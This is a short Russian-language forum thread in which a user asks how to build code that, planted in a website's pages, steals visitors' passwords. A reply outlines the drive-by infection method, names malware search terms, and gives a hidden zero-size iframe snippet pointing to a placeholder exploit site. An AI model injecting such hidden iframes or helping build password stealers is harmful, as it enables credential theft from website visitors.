В общем когда его включают в главную страничку дизайна(html) или в главную страницу сайта(php) и после того как кто-нибудь зайдет на сайт то его все пароли отправляются на мыло тому кто оставил этот код...что это такое?
Вы мне можете подсказать где его найти ? Ну и коротко может рассказать что это за штука и что конкретно она может. Буду очень благодарен.
ну да, только я так в общих чертах это знаю. Знаю что этот фрейм ворует пароли. Просто может кто поподробней обьсянит как его создать и по каким именно чертам он будет работать ?
<>LOLik</> Если не вникать в тонкости, то всё просто : программа-эксплойт через дыру в браузере заливает программу-вирус на компьютер посетителя и запускает ее, программа-вирус ищет на компьютере посетителя пароли и отправляет их хакеру. Подробней ты сможешь узнать, если поищешь по форуму по словам "pinch", "связка", "iframe"
<iframe src="http://твоймегасайтсмегаплойтомукоторогомегапробиффиващщепипец" width="0" height="0"></iframe>
такие хакеры собрались...жесть но никто так и не сказал что фреймы используются не только для сплоитов))